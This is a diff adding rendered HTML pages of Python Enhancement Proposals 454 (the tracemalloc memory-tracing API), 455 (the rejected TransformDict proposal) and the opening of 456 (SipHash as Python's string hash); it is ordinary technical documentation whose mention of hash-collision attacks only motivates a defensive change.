There are debug tools dedicated to the Python language, like Heapy, Pympler and Meliae, which list all live objects using the garbage collector module (functions like gc.get_objects(), gc.get_referrers() and gc.get_referents()), compute their size (e.g. using sys.getsizeof()) and group objects by type. These tools provide a better estimation of the memory usage of an application. They are useful when most memory leaks are instances of the same type and this type is only instantiated in a few functions. Problems arise when the object type is very common, like str or tuple, and it is hard to identify where these objects are instantiated.
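For illustration, grouping live objects by type with the garbage collector module might look like this (a sketch, not part of any of the tools above):

import gc
import sys
from collections import Counter

sizes = Counter()
for obj in gc.get_objects():
    # Estimate and accumulate the size of each live object by type.
    sizes[type(obj).__name__] += sys.getsizeof(obj)

for name, size in sizes.most_common(5):
    print(name, size)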

+

Finding reference cycles is also a difficult problem. There are +different tools to draw a diagram of all references. These tools +cannot be used on large applications with thousands of objects because +the diagram is too huge to be analyzed manually.

+
+
+

Proposal

+

Using the customized allocation API from PEP 445, it becomes easy to set up a hook on Python memory allocators. A hook can inspect Python internals to retrieve Python tracebacks. The idea of getting the current traceback comes from the faulthandler module. faulthandler dumps the traceback of all Python threads on a crash; here the idea is to get the traceback of the current Python thread when a memory block is allocated by Python.

+

This PEP proposes to add a new tracemalloc module, a debug tool +to trace memory blocks allocated by Python. The module provides the +following information:

+
    +
  • Traceback where an object was allocated
  • +
  • Statistics on allocated memory blocks per filename and per line +number: total size, number and average size of allocated memory blocks
  • +
  • Computed differences between two snapshots to detect memory leaks
  • +
+

The API of the tracemalloc module is similar to the API of the faulthandler +module: enable() / start(), disable() / stop() and +is_enabled() / is_tracing() functions, an environment variable +(PYTHONFAULTHANDLER and PYTHONTRACEMALLOC), and a -X command line +option (-X faulthandler and -X tracemalloc). See the documentation of +the faulthandler module.

+

The idea of tracing memory allocations is not new. It was first implemented in the PySizer project in 2005. PySizer was implemented differently: the traceback was stored in frame objects, and for some Python types the trace was linked with the name of the object type. The PySizer patch on CPython adds a performance and memory overhead even when PySizer is not used. tracemalloc attaches a traceback at the underlying layer, to memory blocks, and has no overhead when the module is not tracing memory allocations.

+

The tracemalloc module has been written for CPython. Other +implementations of Python may not be able to provide it.

+
+
+

API

+

To trace most memory blocks allocated by Python, the module should be +started as early as possible by setting the PYTHONTRACEMALLOC +environment variable to 1, or by using -X tracemalloc command +line option. The tracemalloc.start() function can be called at +runtime to start tracing Python memory allocations.

+

By default, a trace of an allocated memory block only stores the most +recent frame (1 frame). To store 25 frames at startup: set the +PYTHONTRACEMALLOC environment variable to 25, or use the -X +tracemalloc=25 command line option. The set_traceback_limit() +function can be used at runtime to set the limit.
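Putting these pieces together, a typical session with the proposed module could look like this (a short illustrative sketch):

import tracemalloc

# Equivalent to PYTHONTRACEMALLOC=25 or -X tracemalloc=25,
# but enabled at runtime.
tracemalloc.start(25)

# ... run the code to analyze ...
data = [str(n) for n in range(100000)]

snapshot = tracemalloc.take_snapshot()
for stat in snapshot.statistics('lineno')[:3]:
    print(stat)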

+
+

Functions

+

clear_traces() function:

+
+
Clear traces of memory blocks allocated by Python.

See also stop().

+
+

get_object_traceback(obj) function:

+
+
Get the traceback where the Python object obj was allocated. +Return a Traceback instance, or None if the tracemalloc +module is not tracing memory allocations or did not trace the +allocation of the object.

See also gc.get_referrers() and sys.getsizeof() functions.
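A small illustrative example (assuming tracing has been started):

import tracemalloc

tracemalloc.start()
obj = dict(a=1)
# Prints the traceback of the allocation above,
# or None if the allocation was not traced.
print(tracemalloc.get_object_traceback(obj))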

+
+

get_traceback_limit() function:

+
+
Get the maximum number of frames stored in the traceback of a trace.

The tracemalloc module must be tracing memory allocations to get +the limit, otherwise an exception is raised.

+

The limit is set by the start() function.

+
+

get_traced_memory() function:

+
+
Get the current size and maximum size of memory blocks traced by the +tracemalloc module as a tuple: (size: int, max_size: int).
+

get_tracemalloc_memory() function:

+
+
Get the memory usage in bytes of the tracemalloc module used to +store traces of memory blocks. Return an int.
+

is_tracing() function:

+
+
True if the tracemalloc module is tracing Python memory +allocations, False otherwise.

See also start() and stop() functions.

+
+

start(nframe: int=1) function:

+
+
Start tracing Python memory allocations: install hooks on Python memory allocators. Collected tracebacks of traces will be limited to nframe frames. By default, a trace of a memory block only stores the most recent frame: the limit is 1. nframe must be greater than or equal to 1.

Storing more than 1 frame is only useful to compute statistics +grouped by 'traceback' or to compute cumulative statistics: see +the Snapshot.compare_to() and Snapshot.statistics() methods.

+

Storing more frames increases the memory and CPU overhead of the +tracemalloc module. Use the get_tracemalloc_memory() +function to measure how much memory is used by the tracemalloc +module.

+

The PYTHONTRACEMALLOC environment variable +(PYTHONTRACEMALLOC=NFRAME) and the -X tracemalloc=NFRAME +command line option can be used to start tracing at startup.

+

See also stop(), is_tracing() and get_traceback_limit() +functions.

+
+

stop() function:

+
+
Stop tracing Python memory allocations: uninstall hooks on Python memory allocators. This also clears the traces of memory blocks allocated by Python.

Call take_snapshot() function to take a snapshot of traces +before clearing them.

+

See also start() and is_tracing() functions.

+
+

take_snapshot() function:

+
+
Take a snapshot of traces of memory blocks allocated by Python. +Return a new Snapshot instance.

The snapshot does not include memory blocks allocated before the +tracemalloc module started to trace memory allocations.

+

Tracebacks of traces are limited to get_traceback_limit() +frames. Use the nframe parameter of the start() function to +store more frames.

+

The tracemalloc module must be tracing memory allocations to +take a snapshot, see the start() function.

+

See also the get_object_traceback() function.

+
+
+
+

Filter

+

Filter(inclusive: bool, filename_pattern: str, lineno: int=None, all_frames: bool=False) class:

+
+
Filter on traces of memory blocks.

See the fnmatch.fnmatch() function for the syntax of +filename_pattern. The '.pyc' and '.pyo' file extensions +are replaced with '.py'.

+

Examples:

+
    +
  • Filter(True, subprocess.__file__) only includes traces of the +subprocess module
  • +
  • Filter(False, tracemalloc.__file__) excludes traces of the +tracemalloc module
  • +
  • Filter(False, "<unknown>") excludes empty tracebacks
  • +
+
+

inclusive attribute:

+
+
If inclusive is True (include), only trace memory blocks +allocated in a file with a name matching filename_pattern at +line number lineno.

If inclusive is False (exclude), ignore memory blocks +allocated in a file with a name matching filename_pattern at +line number lineno.

+
+

lineno attribute:

+
+
Line number (int) of the filter. If lineno is None, the +filter matches any line number.
+

filename_pattern attribute:

+
+
Filename pattern of the filter (str).
+

all_frames attribute:

+
+
If all_frames is True, all frames of the traceback are +checked. If all_frames is False, only the most recent frame is +checked.

This attribute is ignored if the traceback limit is less than 2. +See the get_traceback_limit() function and +Snapshot.traceback_limit attribute.

+
+
+
+

Frame

+

Frame class:

+
+
Frame of a traceback.

The Traceback class is a sequence of Frame instances.

+
+

filename attribute:

+
+
Filename (str).
+

lineno attribute:

+
+
Line number (int).
+
+
+

Snapshot

+

Snapshot class:

+
+
Snapshot of traces of memory blocks allocated by Python.

The take_snapshot() function creates a snapshot instance.

+
+

compare_to(old_snapshot: Snapshot, group_by: str, cumulative: bool=False) method:

+
+
Compute the differences with an old snapshot. Get statistics as a +sorted list of StatisticDiff instances grouped by group_by.

See the statistics() method for group_by and cumulative +parameters.

+

The result is sorted from the biggest to the smallest by: absolute +value of StatisticDiff.size_diff, StatisticDiff.size, +absolute value of StatisticDiff.count_diff, Statistic.count +and then by StatisticDiff.traceback.
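For example, detecting a leak between two points of a program might look like this (an illustrative sketch):

import tracemalloc

tracemalloc.start()
snapshot1 = tracemalloc.take_snapshot()

leaky = [object() for _ in range(10000)]

snapshot2 = tracemalloc.take_snapshot()
for diff in snapshot2.compare_to(snapshot1, 'lineno')[:3]:
    print(diff)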

+
+

dump(filename) method:

+
+
Write the snapshot into a file.

Use load() to reload the snapshot.

+
+

filter_traces(filters) method:

+
+
Create a new Snapshot instance with a filtered traces sequence; filters is a list of Filter instances. If filters is an empty list, return a new Snapshot instance with a copy of the traces.

All inclusive filters are applied at once, a trace is ignored if no +inclusive filters match it. A trace is ignored if at least one +exclusive filter matches it.
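For example, excluding the module’s own allocations and empty tracebacks (a sketch based on the Filter examples above):

import tracemalloc

tracemalloc.start()
snapshot = tracemalloc.take_snapshot()
snapshot = snapshot.filter_traces([
    tracemalloc.Filter(False, tracemalloc.__file__),
    tracemalloc.Filter(False, "<unknown>"),
])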

+
+

load(filename) classmethod:

+
+
Load a snapshot from a file.

See also dump().

+
+

statistics(group_by: str, cumulative: bool=False) method:

+
+
Get statistics as a sorted list of Statistic instances grouped by group_by:

group_by       description
=============  =========================
'filename'     filename
'lineno'       filename and line number
'traceback'    traceback

If cumulative is True, cumulate the size and count of memory blocks of all frames of the traceback of a trace, not only the most recent frame. The cumulative mode can only be used with group_by set to 'filename' or 'lineno', and with traceback_limit greater than 1.

+

The result is sorted from the biggest to the smallest by: +Statistic.size, Statistic.count and then by +Statistic.traceback.

+
+

traceback_limit attribute:

+
+
Maximum number of frames stored in the traceback of traces: +result of the get_traceback_limit() when the snapshot was taken.
+

traces attribute:

+
+
Traces of all memory blocks allocated by Python: sequence of +Trace instances.

The sequence has an undefined order. Use the +Snapshot.statistics() method to get a sorted list of statistics.

+
+
+
+

Statistic

+

Statistic class:

+
+
Statistic on memory allocations.

Snapshot.statistics() returns a list of Statistic instances.

+

See also the StatisticDiff class.

+
+

count attribute:

+
+
Number of memory blocks (int).
+

size attribute:

+
+
Total size of memory blocks in bytes (int).
+

traceback attribute:

+
+
Traceback where the memory block was allocated, Traceback +instance.
+
+
+

StatisticDiff

+

StatisticDiff class:

+
+
Statistic difference on memory allocations between an old and a new +Snapshot instance.

Snapshot.compare_to() returns a list of StatisticDiff +instances. See also the Statistic class.

+
+

count attribute:

+
+
Number of memory blocks in the new snapshot (int): 0 if the +memory blocks have been released in the new snapshot.
+

count_diff attribute:

+
+
Difference of number of memory blocks between the old and the new +snapshots (int): 0 if the memory blocks have been allocated +in the new snapshot.
+

size attribute:

+
+
Total size of memory blocks in bytes in the new snapshot (int): +0 if the memory blocks have been released in the new snapshot.
+

size_diff attribute:

+
+
Difference of total size of memory blocks in bytes between the old +and the new snapshots (int): 0 if the memory blocks have +been allocated in the new snapshot.
+

traceback attribute:

+
+
Traceback where the memory blocks were allocated, Traceback +instance.
+
+
+

Trace

+

Trace class:

+
+
Trace of a memory block.

The Snapshot.traces attribute is a sequence of Trace +instances.

+
+

size attribute:

+
+
Size of the memory block in bytes (int).
+

traceback attribute:

+
+
Traceback where the memory block was allocated, Traceback +instance.
+
+
+

Traceback

+

Traceback class:

+
+
Sequence of Frame instances sorted from the most recent frame to +the oldest frame.

A traceback contains at least 1 frame. If the tracemalloc module +failed to get a frame, the filename "<unknown>" at line number 0 is +used.

+

When a snapshot is taken, tracebacks of traces are limited to +get_traceback_limit() frames. See the take_snapshot() +function.

+

The Trace.traceback attribute is an instance of Traceback.

+
+
+
+
+

Rejected Alternatives

+
+

Log calls to the memory allocator

+

A different approach is to log calls to the malloc(), realloc() and free() functions. Calls can be logged into a file or sent to another computer through the network. Example of a log entry: name of the function, size of the memory block, address of the memory block, Python traceback where the allocation occurred, timestamp.

+

Logs cannot be used directly: getting the current status of the memory requires parsing previous logs. For example, it is not possible to directly get the traceback of a Python object, as get_object_traceback(obj) does with traces.

+

Python uses objects with a very short lifetime and so makes extensive use of memory allocators. It has an allocator optimized for small objects (less than 512 bytes) with a short lifetime. For example, the Python test suite calls malloc(), realloc() or free() 270,000 times per second on average. If the size of a log entry is 32 bytes, logging produces 8.2 MB per second, or 29.0 GB per hour.

+

The alternative was rejected because it is less efficient and has fewer features. Parsing logs in a different process or on a different computer is slower than maintaining traces on allocated memory blocks in the same process.

+
+
+
+

Prior Work

+
    +
  • Python Memory Validator (2005-2013): +commercial Python memory validator developed by Software Verification. +It uses the Python Reflection API.
  • +
  • PySizer: Google Summer of Code 2005 project by +Nick Smallbone.
  • +
  • Heapy (2006-2013): +part of the Guppy-PE project written by Sverker Nilsson.
  • +
• Draft PEP: Support Tracking Low-Level Memory Usage in CPython (Brett Cannon, 2006)
  • +
  • Muppy: project developed in 2008 by Robert Schuppenies.
  • +
  • asizeof: +a pure Python module to estimate the size of objects by Jean +Brouwers (2008).
  • +
  • Heapmonitor: +It provides facilities to size individual objects and can track all objects +of certain classes. It was developed in 2008 by Ludwig Haehne.
  • +
  • Pympler (2008-2011): +project based on asizeof, muppy and HeapMonitor
  • +
  • objgraph (2008-2012)
  • +
  • Dozer: WSGI Middleware version +of the CherryPy memory leak debugger, written by Marius Gedminas (2008-2013)
  • +
  • Meliae: +Python Memory Usage Analyzer developed by John A Meinel since 2009
  • +
  • gdb-heap: gdb script written in +Python by Dave Malcolm (2010-2011) to analyze the usage of the heap memory
  • +
  • memory_profiler: +written by Fabian Pedregosa (2011-2013)
  • +
  • caulk: written by Ben Timby in 2012
  • +
+

See also Pympler Related Work.

+
+ + +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0454.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0455/index.html b/pep-0455/index.html
new file mode 100644
index 00000000000..eaae2fbce15
--- /dev/null
+++ b/pep-0455/index.html
PEP 455 – Adding a key-transforming dictionary to collections | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 455 – Adding a key-transforming dictionary to collections

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
BDFL-Delegate:
+
Raymond Hettinger
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
13-Sep-2013
+
Python-Version:
+
3.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new data structure for the collections module, +called “TransformDict” in this PEP. This structure is a mutable mapping +which transforms the key using a given function when doing a lookup, but +retains the original key when reading.

+
+

Rejection

+

See the rationale at +https://mail.python.org/pipermail/python-dev/2015-May/140003.html +and for an earlier partial review, see +https://mail.python.org/pipermail/python-dev/2013-October/129937.html .

+
+
+
+

Rationale

+

Numerous specialized versions of this pattern exist. The most common +is a case-insensitive case-preserving dict, i.e. a dict-like container +which matches keys in a case-insensitive fashion but retains the original +casing. It is a very common need in network programming, as many +protocols feature some arrays of “key / value” properties in their +messages, where the keys are textual strings whose case is specified to +be ignored on receipt but by either specification or custom is to be +preserved or non-trivially canonicalized when retransmitted.

+

Another common request is an identity dict, where keys are matched +according to their respective id()s instead of normal matching.

+

Both are instances of a more general pattern, where a given transformation +function is applied to keys when looking them up: that function being +str.lower or str.casefold in the former example and the built-in +id function in the latter.

+

(It could be said that the pattern projects keys from the user-visible +set onto the internal lookup set.)

+
+
+

Semantics

+

TransformDict is a MutableMapping implementation: it faithfully +implements the well-known API of mutable mappings, like dict itself +and other dict-like classes in the standard library. Therefore, this PEP +won’t rehash the semantics of most TransformDict methods.

+

The transformation function needn’t be bijective; it can be strictly surjective, as in the case-insensitive example (in other words, different keys can look up the same value):

+
>>> d = TransformDict(str.casefold)
+>>> d['SomeKey'] = 5
+>>> d['somekey']
+5
+>>> d['SOMEKEY']
+5
+
+
+

TransformDict retains the first key used when creating an entry:

+
>>> d = TransformDict(str.casefold)
+>>> d['SomeKey'] = 1
+>>> d['somekey'] = 2
+>>> list(d.items())
+[('SomeKey', 2)]
+
+
+

The original keys needn’t be hashable, as long as the transformation +function returns a hashable one:

+
>>> d = TransformDict(id)
+>>> l = [None]
+>>> d[l] = 5
+>>> l in d
+True
+
+
+
+

Constructor

+

As shown in the examples above, creating a TransformDict requires passing +the key transformation function as the first argument (much like creating +a defaultdict requires passing the factory function as first argument).

+

The constructor also takes other optional arguments which can be used +to initialize the TransformDict with certain key-value pairs. Those +optional arguments are the same as in the dict and defaultdict +constructors:

+
>>> d = TransformDict(str.casefold, [('Foo', 1)], Bar=2)
+>>> sorted(d.items())
+[('Bar', 2), ('Foo', 1)]
+
+
+
+
+

Getting the original key

+

TransformDict also features a lookup method returning the stored key +together with the corresponding value:

+
>>> d = TransformDict(str.casefold, {'Foo': 1})
+>>> d.getitem('FOO')
+('Foo', 1)
+>>> d.getitem('bar')
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+KeyError: 'bar'
+
+
+

The method name getitem() follows the standard popitem() method +on mutable mappings.

+
+
+

Getting the transformation function

+

TransformDict has a simple read-only property transform_func which +gives back the transformation function.
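To make the proposed semantics concrete, here is a minimal pure Python sketch of the class (an illustration only, not the actual patch tracked for the collections module):

from collections.abc import MutableMapping

class TransformDict(MutableMapping):
    # Internally maps transform(key) -> (original_key, value).

    def __init__(self, transform_func, *args, **kwargs):
        self._transform = transform_func
        self._data = {}
        self.update(*args, **kwargs)

    @property
    def transform_func(self):
        return self._transform

    def __setitem__(self, key, value):
        tkey = self._transform(key)
        # Retain the first key used when creating an entry.
        original = self._data.get(tkey, (key, None))[0]
        self._data[tkey] = (original, value)

    def __getitem__(self, key):
        return self._data[self._transform(key)][1]

    def __delitem__(self, key):
        del self._data[self._transform(key)]

    def __iter__(self):
        return (original for original, value in self._data.values())

    def __len__(self):
        return len(self._data)

    def getitem(self, key):
        # Return the stored (original_key, value) pair.
        return self._data[self._transform(key)]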

+
+
+
+

Alternative proposals and questions

+
+

Retaining the last original key

+

Most python-dev respondents found retaining the first user-supplied key +more intuitive than retaining the last. Also, it matches the dict +object’s own behaviour when using different but equal keys:

+
>>> d = {}
+>>> d[1] = 'hello'
+>>> d[1.0] = 'world'
+>>> d
+{1: 'world'}
+
+
+

Furthermore, explicitly retaining the last key in a first-key-retaining +scheme is still possible using the following approach:

+
d.pop(key, None)
+d[key] = value
+
+
+

while the converse (retaining the first key in a last-key-retaining +scheme) doesn’t look possible without rewriting part of the container’s +code.

+
+
+

Using an encoder / decoder pair

+

Using a function pair isn’t necessary, since the original key is retained +by the container. Moreover, an encoder / decoder pair would require the +transformation to be bijective, which prevents important use cases +like case-insensitive matching.

+
+
+

Providing a transformation function for values

+

Dictionary values are not used for lookup, their semantics are totally +irrelevant to the container’s operation. Therefore, there is no point in +having both an “original” and a “transformed” value: the transformed +value wouldn’t be used for anything.

+
+
+

Providing a specialized container, not generic

+

It was asked why we would provide the generic TransformDict construct +rather than a specialized case-insensitive dict variant. The answer +is that it’s nearly as cheap (code-wise and performance-wise) to provide +the generic construct, and it can fill more use cases.

+

Even case-insensitive dicts can actually elicit different transformation +functions: str.lower, str.casefold or in some cases bytes.lower +when working with text encoded in an ASCII-compatible encoding.

+
+
+

Other constructor patterns

+

Two other constructor patterns were proposed by Serhiy Storchaka:

+
    +
  • A type factory scheme:
    d = TransformDict(str.casefold)(Foo=1)
    +
    +
    +
  • +
  • A subclassing scheme:
    class CaseInsensitiveDict(TransformDict):
    +    __transform__ = str.casefold
    +
    +d = CaseInsensitiveDict(Foo=1)
    +
    +
    +
  • +
+

While both approaches can be defended, they don’t follow established +practices in the standard library, and therefore were rejected.

+
+
+
+

Implementation

+

A patch for the collections module is tracked on the bug tracker at +http://bugs.python.org/issue18986.

+
+
+

Existing work

+

Case-insensitive dicts are a popular request:

+ +

Identity dicts have been requested too:

+ +

Several modules in the standard library use identity lookups for object +memoization, for example pickle, json, copy, cProfile, +doctest and _threading_local.

+
+

Other languages

+
+

C# / .Net

+

.Net has a generic Dictionary class where you can specify a custom +IEqualityComparer: http://msdn.microsoft.com/en-us/library/xfhwa508.aspx

+

Using it is the recommended way to write case-insensitive dictionaries: +http://stackoverflow.com/questions/13230414/case-insensitive-access-for-generic-dictionary

+
+
+

Java

+

Java has a specialized CaseInsensitiveMap: +http://commons.apache.org/proper/commons-collections/apidocs/org/apache/commons/collections4/map/CaseInsensitiveMap.html

+

It also has a separate IdentityHashMap: +http://docs.oracle.com/javase/6/docs/api/java/util/IdentityHashMap.html

+
+
+

C++

+

The C++ Standard Template Library features an unordered_map +with customizable hash and equality functions: +http://www.cplusplus.com/reference/unordered_map/unordered_map/

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0455.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0456/index.html b/pep-0456/index.html
new file mode 100644
index 00000000000..1c2066bcae1
--- /dev/null
+++ b/pep-0456/index.html
PEP 456 – Secure and interchangeable hash algorithm | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 456 – Secure and interchangeable hash algorithm

+
+
Author:
+
Christian Heimes <christian at python.org>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Sep-2013
+
Python-Version:
+
3.4
+
Post-History:
+
06-Oct-2013, 14-Nov-2013, 20-Nov-2013
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes SipHash as default string and bytes hash algorithm to properly +fix hash randomization once and for all. It also proposes modifications to +Python’s C code in order to unify the hash code and to make it easily +interchangeable.

+
+
+

Rationale

+

Despite the last attempt [issue13703], CPython is still vulnerable to hash collision DoS attacks [29c3] [issue14621]. The current hash algorithm and its randomization are not resilient against attacks. Only a proper cryptographic hash function prevents the extraction of secret randomization keys. Although no practical attack against a Python-based service has been seen yet, the weakness has to be fixed. Jean-Philippe Aumasson and Daniel J. Bernstein have already shown how the seed for the current implementation can be recovered [poc].

+

Furthermore, the current hash algorithm is hard-coded and implemented multiple +times for bytes and three different Unicode representations UCS1, UCS2 and +UCS4. This makes it impossible for embedders to replace it with a different +implementation without patching and recompiling large parts of the interpreter. +Embedders may want to choose a more suitable hash function.

+

Finally, the current implementation code does not perform well. In the common case it only processes one or two bytes per cycle. On a modern 64-bit processor the code can easily be adjusted to deal with eight bytes at once.

+

This PEP proposes three major changes to the hash code for strings and bytes:

+
    +
• SipHash [sip] is introduced as the default hash algorithm. It is fast and small despite its cryptographic properties. Since it was designed by well-known security and crypto experts, it is safe to assume that it is secure for the near future.
  • +
  • The existing FNV code is kept for platforms without a 64-bit data type. The +algorithm is optimized to process larger chunks per cycle.
  • +
  • Calculation of the hash of strings and bytes is moved into a single API +function instead of multiple specialized implementations in +Objects/object.c and Objects/unicodeobject.c. The function takes a +void pointer plus length and returns the hash for it.
  • +
  • The algorithm can be selected at compile time. FNV is guaranteed to exist +on all platforms. SipHash is available on the majority of modern systems.
  • +
+
+
+

Requirements for a hash function

+
    +
  • It MUST be able to hash arbitrarily large blocks of memory from 1 byte up +to the maximum ssize_t value.
  • +
  • It MUST produce at least 32 bits on 32-bit platforms and at least 64 bits +on 64-bit platforms. (Note: Larger outputs can be compressed with e.g. +v ^ (v >> 32).)
  • +
  • It MUST support hashing of unaligned memory in order to support +hash(memoryview).
  • +
  • It is highly RECOMMENDED that the length of the input influences the +outcome, so that hash(b'\00') != hash(b'\x00\x00').
  • +
+

The internal interface code between the hash function and the tp_hash slots +implements special cases for zero length input and a return value of -1. +An input of length 0 is mapped to hash value 0. The output -1 +is mapped to -2.
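A small sketch of that mapping in Python (the helper name is hypothetical):

def adjust_hash(h, length):
    # Mirror the special cases of the interface code described above.
    if length == 0:
        return 0    # zero-length input is mapped to hash value 0
    if h == -1:
        return -2   # -1 is reserved for signalling errors in tp_hash
    return h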

+
+
+

Current implementation with modified FNV

+

CPython currently uses a variant of the Fowler-Noll-Vo hash function [fnv]. The variant has been modified to reduce the amount and cost of hash collisions for common strings. The first character of the string is added twice, the first time with a bit shift of 7. The length of the input string is XOR-ed into the final value. Both deviations from the original FNV algorithm reduce the amount of hash collisions for short strings.

+

Recently [issue13703] a random prefix and suffix were added as an attempt to +randomize the hash values. In order to protect the hash secret the code still +returns 0 for zero length input.

+

C code:

+
Py_uhash_t x;
+Py_ssize_t len;
+/* p is either 1, 2 or 4 byte type */
+unsigned char *p;
+Py_UCS2 *p;
+Py_UCS4 *p;
+
+if (len == 0)
+    return 0;
+x = (Py_uhash_t) _Py_HashSecret.prefix;
+x ^= (Py_uhash_t) *p << 7;
+for (i = 0; i < len; i++)
+    x = (1000003 * x) ^ (Py_uhash_t) *p++;
+x ^= (Py_uhash_t) len;
+x ^= (Py_uhash_t) _Py_HashSecret.suffix;
+return x;
+
+
+

Which roughly translates to Python:

+
def fnv(p):
+    if len(p) == 0:
+        return 0
+
+    # bit mask, 2**32-1 or 2**64-1
+    mask = 2 * sys.maxsize + 1
+
+    x = hashsecret.prefix
+    x = (x ^ (ord(p[0]) << 7)) & mask
+    for c in p:
+        x = ((1000003 * x) ^ ord(c)) & mask
+    x = (x ^ len(p)) & mask
+    x = (x ^ hashsecret.suffix) & mask
+
+    if x == -1:
+        x = -2
+
+    return x
+
+
+

FNV is a simple multiply-and-XOR algorithm with no cryptographic properties. The randomization was not part of the initial hash code, but was added as a countermeasure against hash collision attacks, as explained in oCERT-2011-003 [ocert]. Because FNV is not a cryptographic hash algorithm and the dict implementation is not fortified against side channel analysis, the randomization secrets can be calculated by a remote attacker. The author of this PEP strongly believes that the nature of a non-cryptographic hash function makes it impossible to conceal the secrets.

+
+
+

Examined hashing algorithms

+

The author of this PEP has researched several hashing algorithms that are +considered modern, fast and state-of-the-art.

+
+

SipHash

+

SipHash [sip] is a cryptographic pseudo random function with a 128-bit seed +and 64-bit output. It was designed by Jean-Philippe Aumasson and Daniel J. +Bernstein as a fast and secure keyed hash algorithm. It’s used by Ruby, Perl, +OpenDNS, Rust, Redis, FreeBSD and more. The C reference implementation has +been released under CC0 license (public domain).

+

Quote from SipHash’s site:

+
+
SipHash is a family of pseudorandom functions (a.k.a. keyed hash +functions) optimized for speed on short messages. Target applications +include network traffic authentication and defense against hash-flooding +DoS attacks.
+

siphash24 is the recommended variant with the best performance. It uses 2 rounds per message block and 4 finalization rounds. Besides the reference implementation, several other implementations are available. Some are single-shot functions, others use a Merkle–Damgård-construction-like approach with init, update and finalize functions. Marek Majkowski’s C implementation csiphash [csiphash] defines the prototype of the function. (Note: k is split up into two uint64_t):

+
uint64_t siphash24(const void *src, unsigned long src_sz, const char k[16])
+
+
+

SipHash requires a 64-bit data type and is not compatible with pure C89 +platforms.

+
+
+

MurmurHash

+

MurmurHash [murmur] is a family of non-cryptographic keyed hash functions developed by Austin Appleby. Murmur3 is the latest and fastest variant of MurmurHash. The C++ reference implementation has been released into the public domain. It features 32- or 128-bit output with a 32-bit seed. (Note: The out parameter is a buffer of either 4 or 16 bytes.)

+

Murmur3’s function prototypes are:

+
void MurmurHash3_x86_32(const void *key, int len, uint32_t seed, void *out)
+
+void MurmurHash3_x86_128(const void *key, int len, uint32_t seed, void *out)
+
+void MurmurHash3_x64_128(const void *key, int len, uint32_t seed, void *out)
+
+
+

The 128-bit variants require a 64-bit data type and are not compatible with pure C89 platforms. The 32-bit variant is fully C89-compatible.

+

Aumasson, Bernstein and Boßlet have shown [sip] [ocert-2012-001] that Murmur3 is not resilient against hash collision attacks. Therefore, Murmur3 can no longer be considered a secure algorithm. It may still be an alternative if hash collision attacks are of no concern.

+
+
+

CityHash

+

CityHash [city] is a family of non-cryptographic hash functions developed by Geoff Pike and Jyrki Alakuijala for Google. The C++ reference implementation has been released under the MIT license. The algorithm is partly based on MurmurHash and claims to be faster. It supports 64- and 128-bit output with a 128-bit seed, as well as 32-bit output without a seed.

+

The relevant function prototype for 64-bit CityHash with 128-bit seed is:

+
uint64 CityHash64WithSeeds(const char *buf, size_t len, uint64 seed0,
+                           uint64 seed1)
+
+
+

CityHash also offers SSE 4.2 optimizations with CRC32 intrinsic for long +inputs. All variants except CityHash32 require 64-bit data types. CityHash32 +uses only 32-bit data types but it doesn’t support seeding.

+

Like MurmurHash, CityHash has been shown by Aumasson, Bernstein and Boßlet [sip] to have a similar weakness.

+
+
+

DJBX33A

+

DJBX33A is a very simple multiplication and addition algorithm by Daniel +J. Bernstein. It is fast and has low setup costs but it’s not secure against +hash collision attacks. Its properties make it a viable choice for small +string hashing optimization.

+
+
+

Other

+

Crypto algorithms such as HMAC, MD5, SHA-1 or SHA-2 are too slow and have +high setup and finalization costs. For these reasons they are not considered +fit for this purpose. Modern AMD and Intel CPUs have AES-NI (AES instruction +set) [aes-ni] to speed up AES encryption. CMAC with AES-NI might be a viable +option but it’s probably too slow for daily operation. (testing required)

+
+
+

Conclusion

+

SipHash provides the best combination of speed and security. Developers of other prominent projects have come to the same conclusion.

+
+
+
+

Small string optimization

+

Hash functions like SipHash24 have costly initialization and finalization code that can dominate the speed of the algorithm for very short strings. On the other hand, Python calculates the hash value of short strings quite often. A simple and fast function, especially for hashing of small strings, can make a measurable impact on performance. For example, these measurements were taken during a run of Python’s regression tests. Additional measurements of other code have shown a similar distribution.

bytes   hash() calls   portion
======  =============  ========
1              18709      0.2%
2             737480      9.5%
3             636178     17.6%
4            1518313     36.7%
5             643022     44.9%
6             770478     54.6%
7             525150     61.2%
8             304873     65.1%
9             297272     68.8%
10             68191     69.7%
11           1388484     87.2%
12            480786     93.3%
13             52730     93.9%
14             65309     94.8%
15             44245     95.3%
16             85643     96.4%
Total        7921678

However, a fast function like DJBX33A is not as secure as SipHash24. A cutoff at about 5 to 7 bytes should provide a decent safety margin and a speed-up at the same time. The PEP’s reference implementation provides such a cutoff with Py_HASH_CUTOFF. The optimization is disabled by default for several reasons. For one, the security implications are unclear yet and should be thoroughly studied before the optimization is enabled by default. Secondly, the performance benefits vary. On a 64-bit Linux system with an Intel Core i7, multiple runs of Python’s benchmark suite [pybench] show average speedups between 3% and 5% for benchmarks such as django_v2, mako and etree with a cutoff of 7. Benchmarks with X86 binaries and Windows X86_64 builds on the same machine are a bit slower with small string optimization.
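The dispatch itself is straightforward; conceptually it behaves like this sketch (djbx33a and siphash24 stand in for the real C implementations):

def py_hash(data, cutoff=7):
    # Use the cheap DJBX33A for very short inputs,
    # the full-strength SipHash24 otherwise.
    if 0 < len(data) < cutoff:
        return djbx33a(data)
    return siphash24(data)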

+

The state of small string optimization will be assessed during the beta phase +of Python 3.4. The feature will either be enabled with appropriate values +or the code will be removed before beta 2 is released.

+
+
+

C API additions

+

All C API extension modifications are not part of the stable API.

+
+

hash secret

+

